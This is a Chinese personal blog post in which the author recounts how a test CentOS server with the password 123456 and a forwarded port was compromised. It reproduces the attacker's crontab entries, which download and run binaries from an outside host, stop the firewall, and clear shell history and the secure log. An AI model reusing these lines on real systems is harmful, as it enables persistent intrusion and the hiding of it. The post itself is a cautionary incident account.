从服务器登录互联网开始,就要注意安全

[文章作者:磨延城 转载请注明原文出处: https://mo2g.com/view/81/ ]

前一段时间,为了测试大数据环境下mysql的性能,我向公司申请了一台PC电脑安装测试环境,搭建详情请看《centos 6.4 搭建nginx+php+MariaDb+memcached开发环境》.因为是用来测试,所以为了方便,密码设置了最简单的123456,又为了方便自己远程登录测试,设置路由器做了端口映射,就这样,测试开始了.

前一段时间,为了测试大数据环境下mysql的性能,我向公司申请了一台PC电脑安装测试环境,搭建详情请看《centos 6.4 搭建nginx+php+MariaDb+memcached开发环境》。因为是用来测试,所以为了方便,密码设置了最简单的123456,又为了方便自己远程登录测试,设置路由器做了端口映射,就这样,测试开始了。

为了测试在不同数据量的MariaDb数据库sql语句的性能,我分别创建包含10W、50W、100W、500W条数据的表。然而就在创建50W的数据表的过程中,服务器卡死了,用来监视服务器资源占用的htop显示,cpu使用率超载了。硬盘超载还能理解,CPU怎么会突然超载?

于是在htop列出的进程中进行排查,突然就有了重大发现。几个陌生的进程出现在显示屏上,分别是sksapd、skysapd、ksapd、kysapd。第一时间意识到测试环境被入侵使坏了,当时有点小兴奋,但又有点纠结。兴奋是因为有人来跟我互动了,顺便可以借着测试环境来了解入侵者的行为习惯;纠结的是以后不能再设置简单的密码了。

经过分析,历史操作信息,确认到crontab进程被做了手脚,入侵者往里边添加了很多信息,大部分是用于掩人耳目的垃圾注释,提取出来的主要信息如下:

*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * cd /etc; rm -rf dir sksapd.*
*/1 * * * * cd /etc; rm -rf dir skysapd.*
*/99 * * * * cd /root > .bash_history
*/1 * * * * chmod 7777 /etc/sksapd
*/1 * * * * chmod 7777 /etc/skysapd
*/99 * * * * killall -9 cupsdd
*/1 * * * * killall -9 node24
*/98 * * * * killall -9 ksapd
*/96 * * * * killall -9 kysapd
*/96 * * * * killall -9 atdd
*/1 * * * * chmod 7777 /etc/cupsdd
*/1 * * * * chmod 7777 /etc/ksapd
*/1 * * * * chmod 7777 /etc/kysapd
*/96 * * * * killall -9 sksapd
*/96 * * * * killall -9 skysapd
*/1 * * * * chmod 7777 /etc/atdd
*/1 * * * * /etc/init.d/iptables stop
*/1 * * * * nohup /etc/cupsdd > /dev/null 2>&1&
*/99 * * * * cd /etc;./ksapd
*/97 * * * * cd /etc;./kysapd
*/97 * * * * cd /etc;./atdd
*/69 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd 
*/97 * * * * cd /etc;./sksapd
*/97 * * * * cd /etc;./skysapd
*/79 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/89 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/99 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/1 * * * * cd /etc; rm -rf dir cupsdd.*
*/1 * * * * cd /etc; rm -rf dir kysapd.*
*/1 * * * * cd /etc; rm -rf dir ksapd.*
*/1 * * * * cd /etc; rm -rf dir atdd.*
*/1 * * * * killall -9 freeBSD
*/1 * * * * history -c
*/15 * * * * cd /var/log > secure

突然想起来,我是打算做测试的,没时间研究入侵习惯。为了赶紧测试,重装了一遍系统,设置了新密码。

这回的经历告诉我,互联网上的入侵者,真的是时刻潜伏着。那么,线下的入侵者,也不会闲着。所以,凡事都要注意安全。

    评论:

    1. 暂无评论...
    2. 我来说两句:

        切换  

      磨途歌检测发现,您当前使用的浏览器版本过低,要想使用画板模式,请先更新浏览器

        切换  

      磨途歌随机验证码